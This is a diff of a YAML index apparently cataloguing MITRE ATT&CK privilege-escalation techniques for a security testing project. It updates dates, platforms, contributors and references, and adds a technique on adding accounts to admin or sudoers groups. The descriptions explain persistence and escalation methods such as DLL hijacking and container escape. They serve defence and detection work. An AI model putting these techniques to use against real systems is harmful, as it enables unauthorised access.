         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16208,12 +16470,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16288,12 +16549,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16313,9 +16573,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16335,9 +16600,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16354,6 +16618,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16387,7 +16655,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16543,31 +16810,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16584,6 +16831,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16594,9 +16842,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16604,13 +16856,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16640,6 +16908,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16650,6 +16919,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16658,13 +16928,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16706,9 +16976,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16776,19 +17043,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16804,8 +17070,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16819,7 +17085,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16845,6 +17111,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16872,12 +17142,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16903,7 +17172,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16945,7 +17214,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -17023,11 +17291,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17107,7 +17374,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17130,7 +17467,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17178,8 +17515,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17211,7 +17546,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17266,13 +17601,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17333,9 +17666,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17344,7 +17677,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17397,7 +17729,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17418,12 +17750,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17526,7 +17857,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17626,7 +17956,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests:
     - name: Deploy container using nsenter container escape
@@ -17795,7 +18124,7 @@ privilege-escalation:
           rmdir #{mount_point}
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17808,7 +18137,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17821,7 +18149,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17851,7 +18178,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17878,7 +18206,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17904,13 +18232,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17987,12 +18313,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -18011,6 +18336,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -18018,7 +18344,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -18038,34 +18363,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -18101,6 +18428,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -18112,16 +18443,12 @@ privilege-escalation:
 
 
